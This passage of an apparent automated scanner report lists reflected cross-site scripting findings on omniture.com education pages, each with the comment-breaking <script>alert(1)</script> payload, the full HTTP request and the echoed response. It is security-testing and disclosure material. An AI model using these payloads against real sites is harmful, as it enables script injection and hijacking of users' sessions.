Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:13:25 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:13:25 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:13:26 GMT
Content-Length: 23169
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:13:25 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>246fdc9e602 cached on 2 February 2011 at 11:13:25 PST (e3b09507cc079545ee170f7149f62ad7) -->
...[SNIP]...

4.469. http://www.omniture.com/en/education/certification/search_center [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/search_center

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 7b60a--><script>alert(1)</script>1ae8da93c4c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/certification7b60a--><script>alert(1)</script>1ae8da93c4c/search_center HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:14:10 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:14:10 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:14:10 GMT
Content-Length: 23161
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:14:10 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>1ae8da93c4c/search_center cached on 2 February 2011 at 11:14:10 PST (0423b1d07b4c49d6e68bc1111d70ff38) -->
...[SNIP]...

4.470. http://www.omniture.com/en/education/certification/search_center [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/search_center

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 2cdc2--><script>alert(1)</script>a3c62f92fdf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/certification/search_center2cdc2--><script>alert(1)</script>a3c62f92fdf HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:14:48 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:14:48 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:14:48 GMT
Content-Length: 23161
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:14:48 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>a3c62f92fdf cached on 2 February 2011 at 11:14:48 PST (1e550748a6f5818d589fb11cb33a1825) -->
...[SNIP]...

4.471. http://www.omniture.com/en/education/certification/site_catalyst [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/site_catalyst

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 53c2a--><script>alert(1)</script>b70728db975 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/certification53c2a--><script>alert(1)</script>b70728db975/site_catalyst HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:14:30 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:14:30 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:14:30 GMT
Content-Length: 23161
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:14:30 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>b70728db975/site_catalyst cached on 2 February 2011 at 11:14:30 PST (b0181063ff4c76bf73b8d29b867a063c) -->
...[SNIP]...

4.472. http://www.omniture.com/en/education/certification/site_catalyst [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/site_catalyst

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload dd1a3--><script>alert(1)</script>2046ce65027 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/certification/site_catalystdd1a3--><script>alert(1)</script>2046ce65027 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:14:56 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:14:56 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:14:56 GMT
Content-Length: 23161
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:14:56 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>2046ce65027 cached on 2 February 2011 at 11:14:56 PST (dd792be8f2827295755320a79f614cdf) -->
...[SNIP]...

4.473. http://www.omniture.com/en/education/certification/support [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/support

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload a5207--><script>alert(1)</script>e0cb34aa69e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/certificationa5207--><script>alert(1)</script>e0cb34aa69e/support HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:14:51 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:14:51 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:14:51 GMT
Content-Length: 23149
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:14:51 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>e0cb34aa69e/support cached on 2 February 2011 at 11:14:51 PST (3318309ecabd00e231f923c3e1456d37) -->
...[SNIP]...

4.474. http://www.omniture.com/en/education/certification/support [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/support

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 96a43--><script>alert(1)</script>9b876000faf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/certification/support96a43--><script>alert(1)</script>9b876000faf HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:15:35 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:15:35 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:15:35 GMT
Content-Length: 23149
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:15:35 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>9b876000faf cached on 2 February 2011 at 11:15:35 PST (4e80afd2bc7e5c8032667c3e55758818) -->
...[SNIP]...

4.475. http://www.omniture.com/en/education/certification/test_target [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/test_target

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload d0476--><script>alert(1)</script>f41183d6438 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/certificationd0476--><script>alert(1)</script>f41183d6438/test_target HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:14:59 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:14:59 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:14:59 GMT
Content-Length: 23157
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:14:59 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>f41183d6438/test_target cached on 2 February 2011 at 11:14:59 PST (9e33a94851c308ad0b4089e3a5e7d07d) -->
...[SNIP]...

4.476. http://www.omniture.com/en/education/certification/test_target [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/test_target

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 55549--><script>alert(1)</script>b54fc3aa547 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/certification/test_target55549--><script>alert(1)</script>b54fc3aa547 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:15:39 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:15:39 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:15:39 GMT
Content-Length: 23157
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:15:39 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>b54fc3aa547 cached on 2 February 2011 at 11:15:39 PST (c30b8f877f12bd485fbe89c78707b1d9) -->
...[SNIP]...

4.477. http://www.omniture.com/en/education/courses [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload b492d--><script>alert(1)</script>a589f3af708 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/coursesb492d--><script>alert(1)</script>a589f3af708 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:08:41 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:08:41 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:08:42 GMT
Content-Length: 23121
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:08:41 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>a589f3af708 cached on 2 February 2011 at 11:08:41 PST (d8c44c4f8718a8369194d744b083ce31) -->
...[SNIP]...

4.478. http://www.omniture.com/en/education/courses/discover [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/discover

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 2594e--><script>alert(1)</script>c303946b74c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/courses2594e--><script>alert(1)</script>c303946b74c/discover HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:09:19 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:09:19 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:09:20 GMT
Content-Length: 23139
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:09:19 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>c303946b74c/discover cached on 2 February 2011 at 11:09:19 PST (e475c5c8b083a0a4c929022e80ae08f5) -->
...[SNIP]...

4.479. http://www.omniture.com/en/education/courses/discover [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/discover

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload d25bc--><script>alert(1)</script>c7e5e428679 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/courses/discoverd25bc--><script>alert(1)</script>c7e5e428679 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:09:52 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:09:52 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:09:52 GMT
Content-Length: 23139
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:09:52 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>c7e5e428679 cached on 2 February 2011 at 11:09:52 PST (db73b8264ad43379a4f0479e469cc599) -->
...[SNIP]...

4.480. http://www.omniture.com/en/education/courses/dop_analyst [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/courses/dop_analyst

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload d897c--><script>alert(1)</script>f92a9dde036 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/coursesd897c--><script>alert(1)</script>f92a9dde036/dop_analyst HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
